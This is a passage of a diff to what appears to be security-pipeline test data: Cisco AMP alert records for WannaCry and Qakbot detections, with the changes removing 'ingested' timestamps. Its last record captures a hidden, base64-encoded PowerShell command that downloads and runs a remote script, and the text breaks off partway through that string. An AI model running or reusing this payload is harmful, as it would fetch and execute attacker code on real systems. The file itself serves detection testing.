Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419229331435814969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "severity": 3 @@ -1533,7 +1515,6 @@ ], "code": "553648147", "id": "6419264043361501000", - "ingested": "2022-02-02T05:53:05.376877299Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":716000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419204905956802579\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "severity": 3 @@ -1615,7 +1596,6 @@ ], "code": "2164260893", "id": "6419264039066534000", - "ingested": "2022-02-02T05:53:05.376878267Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264039066534000,\"timestamp\":1610643346,\"timestamp_nanoseconds\":718000000,\"date\":\"2021-01-14T16:55:46+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419229322845880359\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225761,\"description\":\"Cannot delete\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "severity": 3 @@ -1687,7 +1667,6 @@ ], "code": "553648155", "id": "6419264039066534000", - "ingested": "2022-02-02T05:53:05.376879252Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264039066534000,\"timestamp\":1610643346,\"timestamp_nanoseconds\":765000000,\"date\":\"2021-01-14T16:55:46+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6419264039066533964\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "severity": 3 @@ -1761,7 +1740,6 @@ ], "code": "553648147", "id": "6419264039066534000", - "ingested": "2022-02-02T05:53:05.376880222Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264039066534000,\"timestamp\":1610643346,\"timestamp_nanoseconds\":749000000,\"date\":\"2021-01-14T16:55:46+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419264039066533964\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3\",\"md5\":\"54a116ff80df6e6031059fc3036464df\"}}}}", "severity": 3 @@ -1845,7 +1823,6 @@ ], "code": "553648147", "id": "6419264039066534000", - "ingested": "2022-02-02T05:53:05.376881199Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264039066534000,\"timestamp\":1610643346,\"timestamp_nanoseconds\":702000000,\"date\":\"2021-01-14T16:55:46+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419229322845880359\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3\",\"md5\":\"54a116ff80df6e6031059fc3036464df\"}}}}", "severity": 3 @@ -1931,7 +1908,6 @@ ], "code": "2164260893", "id": "6412622782676337000", - "ingested": "2022-02-02T05:53:05.376882341Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":729000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412622782676336648\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "severity": 3 @@ -2007,7 +1983,6 @@ ], "code": "2164260893", "id": "6412622782676337000", - "ingested": "2022-02-02T05:53:05.376883325Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":729000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412622782676336647\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "severity": 3 @@ -2083,7 +2058,6 @@ ], "code": "2164260893", "id": "6412622782676337000", - "ingested": "2022-02-02T05:53:05.376884380Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":713000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412622782676336646\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "severity": 3 @@ -2157,7 +2131,6 @@ ], "code": "553648147", "id": "6412622782676337000", - "ingested": "2022-02-02T05:53:05.376885343Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":198000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412622782676336647\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"kepv86368.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\kepv86368.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "severity": 3 @@ -2237,7 +2210,6 @@ ], "code": "553648147", "id": "6412622782676337000", - "ingested": "2022-02-02T05:53:05.376886417Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":198000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412622782676336646\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"uqlq0o884.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\uqlq0o884.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "severity": 3 @@ -2317,7 +2289,6 @@ ], "code": "553648147", "id": "6412622782676337000", - "ingested": "2022-02-02T05:53:05.376887584Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":198000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412622782676336645\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"120C.tmp\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\120C.tmp\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\",\"sha1\":\"f5a171c879b90e77861daf19741b373646d791ff\",\"md5\":\"32c9e6737dbdcbfb7563a3f27e2b1571\"}}}}", "severity": 3 @@ -2401,7 +2372,6 @@ ], "code": "553648147", "id": "6412622782676337000", - "ingested": "2022-02-02T05:53:05.376888924Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":183000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412622782676336644\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\QuotaGroup\\\\QuotaGroup.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\",\"sha1\":\"92673dd0e5f4a094fa6cd57bb301f884f2289f6c\",\"md5\":\"2f99e3456dc1d26f77c52b2119fde92f\"}}}}", "severity": 3 @@ -2596,7 +2566,6 @@ "action": "Threat Detection", "code": "553648222", "id": "6880683125978957000", - "ingested": "2022-02-02T05:53:05.376889893Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880683125978957000,\"timestamp\":1610640884,\"timestamp_nanoseconds\":810000000,\"date\":\"2021-01-14T16:14:44+00:00\",\"event_type\":\"Threat Detection\",\"event_type_id\":553648222,\"detection\":\"WMIPRVSE Launched Encoded Powershell Command\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"bp_data\":{\"audit\":false,\"details\":{\"actions\":[{\"action\":\"end_process\",\"end_ts\":1602033881808,\"params\":[\"10724\"],\"start_ts\":1602033881805,\"status\":\"success\"}],\"eng_epoch\":1,\"eng_ver\":\"0.9.0.104\",\"matched_activity\":{\"events\":[{\"process:start\":{\"app\":\"powershell.exe\",\"app_path\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\",\"args\":[\"powershell.exe\",\"-NoP\",\"-NonI\",\"-W\",\"Hidden\",\"-E\",\"JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAA